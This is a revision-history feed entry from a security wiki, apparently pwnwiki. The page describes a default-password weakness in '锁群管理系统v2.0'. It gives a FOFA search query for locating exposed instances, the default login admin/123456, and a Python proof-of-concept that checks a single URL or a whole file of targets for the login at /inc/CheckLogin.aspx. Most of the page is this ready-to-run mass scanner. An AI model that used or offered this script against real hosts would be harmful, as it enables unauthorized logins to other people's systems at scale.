https://pwnwiki.com/index.php?action=history&feed=atom&title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E
鎖群管理系統v2.0 弱口令漏洞 - Revision history
2026-04-16T19:52:06Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=%E9%8E%96%E7%BE%A4%E7%AE%A1%E7%90%86%E7%B3%BB%E7%B5%B1v2.0_%E5%BC%B1%E5%8F%A3%E4%BB%A4%E6%BC%8F%E6%B4%9E&diff=3286&oldid=prev
Pwnwiki: Created page with "==FOFA== <pre> title="锁群管理系统v2.0" </pre> ==默認憑據== 用戶名:admin 密碼:123456 ==POC== <pre> import requests import sys import argparse from request..."
2021-05-26T05:04:29Z
<p>Created page with "==FOFA== <pre> title="锁群管理系统v2.0" </pre> ==默認憑據== 用戶名:admin 密碼:123456 ==POC== <pre> import requests import sys import argparse from request..."</p>
<p><b>New page</b></p><div>==FOFA==<br />
<pre><br />
title="锁群管理系统v2.0"<br />
</pre><br />
<br />
==默認憑據==<br />
用戶名:admin<br />
密碼:123456<br />
<br />
==POC==<br />
<pre><br />
import requests<br />
import sys<br />
import argparse<br />
from requests.packages.urllib3.exceptions import InsecureRequestWarning #消除警告<br />
requests.packages.urllib3.disable_warnings(InsecureRequestWarning) # 消除警告<br />
<br />
def lemonlove7():<br />
print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')<br />
print('python xxx.py -f/--file x.txt')<br />
print('FOFA:title="锁群管理系统v2.0"')<br />
print('lemonlove7')<br />
<br />
if len(sys.argv)==1:<br />
lemonlove7()<br />
sys.exit()<br />
p = argparse.ArgumentParser(description='lemonlove7')<br />
p.add_argument('-u','--url',help='输入url',default='')<br />
p.add_argument('-f','--file',help='输入文件',default='')<br />
a = p.parse_args()<br />
<br />
url = a.url<br />
<br />
file = a.file<br />
<br />
headers= {<br />
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',<br />
'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',<br />
'Cookie':'ASP.NET_SessionId=pjb41rehvxilis32hfgus0r5'<br />
}<br />
if url != '':<br />
furl = url<br />
try:<br />
url =furl+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'<br />
r= requests.get(url=url,headers=headers,timeout=10,verify=False)<br />
if r.status_code == 200 and '0' in r.text:<br />
print(furl+'存在弱口令')<br />
else:<br />
print(furl+'不存在弱口令')<br />
except Exception as e:<br />
print(furl+'不存在弱口令')<br />
<br />
if file !='':<br />
text =file<br />
f = open(text,'r+')<br />
for i in f.readlines():<br />
url = i.strip()<br />
if url.startswith('http:') != 1 and url.startswith('https:') != 1:<br />
url = 'http://' + url<br />
url1 = url<br />
url2=url<br />
try:<br />
url1 = url+'/inc/CheckLogin.aspx?checkLogin=login&un=admin&pw=123456'<br />
r =requests.post(url=url1,headers=headers,timeout = 10,verify=False)<br />
if r.status_code==200 and '0' in r.text:<br />
print(url2+'存在弱口令')<br />
else:<br />
print(url2+'不存在弱口令')<br />
except Exception as e:<br />
print(url2+'不存在弱口令')<br />
</pre><br />
<br />
<br />
==參考==<br />
https://mp.weixin.qq.com/s/Xu0_SCMwhCR9Bx7mo8v1kw</div>
Pwnwiki